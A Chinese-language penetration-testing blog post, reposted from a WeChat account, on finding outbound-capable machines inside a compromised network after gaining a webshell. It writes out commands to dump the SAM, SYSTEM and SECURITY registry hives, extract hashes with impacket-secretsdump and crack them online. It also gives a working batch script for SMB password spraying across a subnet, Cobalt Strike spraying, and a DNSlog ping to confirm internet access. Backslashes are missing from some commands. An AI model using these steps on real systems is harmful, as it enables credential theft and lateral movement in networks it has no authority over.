内网渗透中寻找出网机器

admin 2022年1月14日19:20:19评论146 views字数 1199阅读3分59秒阅读模式

0x00:前提

    在webshell控制中,偶尔会遇到ipconfig查询IP,里面的IP查询结果跟实际webshell的IP地址不同.

    这种情况有可能是做了反向代理,或者其他情况.存在这种情况下,结合之前的文章获取一个shell.

例如:

内网渗透中寻找出网机器

那么就应该想方法让对方出网:

1、结合之前的文章进行出网

frp反向代理+MSF获取shell

2、读出本机密码,然后内网smb喷射,寻找内网能出网的机器,然后出网.

3、等等

0x01:过程

一、读出hash

reg save HKLMSYSTEM sys.hivreg save HKLMSAM sam.hivreg save hklmsecurity security.hiv

内网渗透中寻找出网机器

然后下载到本地

内网渗透中寻找出网机器

利用kali自带小工具进行读取hash


impacket-secretsdump -sam sam.hiv -system sys.hiv -security security.hiv LOCAL

内网渗透中寻找出网机器

在线hash破解

https://www.objectif-securite.ch/ophcrackhttps://cmd5.com/

内网渗透中寻找出网机器


二、寻找内网开放smb机器

内网渗透中寻找出网机器


然后再把事先通过其它渠道搜集到的更多的管理账号密码写进去,越多越好

内网渗透中寻找出网机器

@echo offset user=Administrador admin1 admin2set pwd=central@1708 pass1 pass2for /f %%i in (c:/users/public/host.txt) do (for %%j in (%pwd%) do (for %%k in (%user%) do (net use \%%ic$ /user:"%%k" "%%j" > nul && ping 127.0.0.1 -n 2 > nul && if %errorlevel% equ 0 ( echo %%i %%k %%j Login Succeed && echo %%i %%k %%j Login Succeed >> c:userspublicSmbCache.txt ) && ping 127.0.0.1 -n 2 > nul && net use \%%ic$ /del > nul && ping 127.0.0.1 -n 2 > nul) ) )

host.txt存放存在开放445端口的IP清单

内网渗透中寻找出网机器

我是C段全部都给放进去了

开启喷射smb

内网渗透中寻找出网机器

结果如下

内网渗透中寻找出网机器

内网渗透中寻找出网机器

内网渗透中寻找出网机器

内网渗透中寻找出网机器

内网渗透中寻找出网机器

    后面还有很多我就不一一列举了

    前面端口扫描完毕以后会在cs(多人运动)中存在记录

内网渗透中寻找出网机器

    我们将上面获取到的密码结合

内网渗透中寻找出网机器

内网渗透中寻找出网机器

 然后cs 就会去做smb喷射

内网渗透中寻找出网机器

然后重复上面喷射出的结果

利用账户密码内网登陆其他主机

内网渗透中寻找出网机器

三、测试是否出外网

    结合dnslog平台测试是否出外网.

内网渗透中寻找出网机器

    接下来是到登陆成功的主机上执行shell ping g5xixi.dnslog.cn 即可,随后到DNSlog平台查看记录.

内网渗透中寻找出网机器

查询IP是否是外网IP

内网渗透中寻找出网机器


获取到出网机器,那么接下来就是转移自己目标,将主力放在能出网的机器上.

内网渗透中寻找出网机器

本文始发于微信公众号(洛米唯熊):内网渗透中寻找出网机器

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月14日19:20:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透中寻找出网机器http://cn-sec.com/archives/497058.html

发表评论

匿名网友 填写信息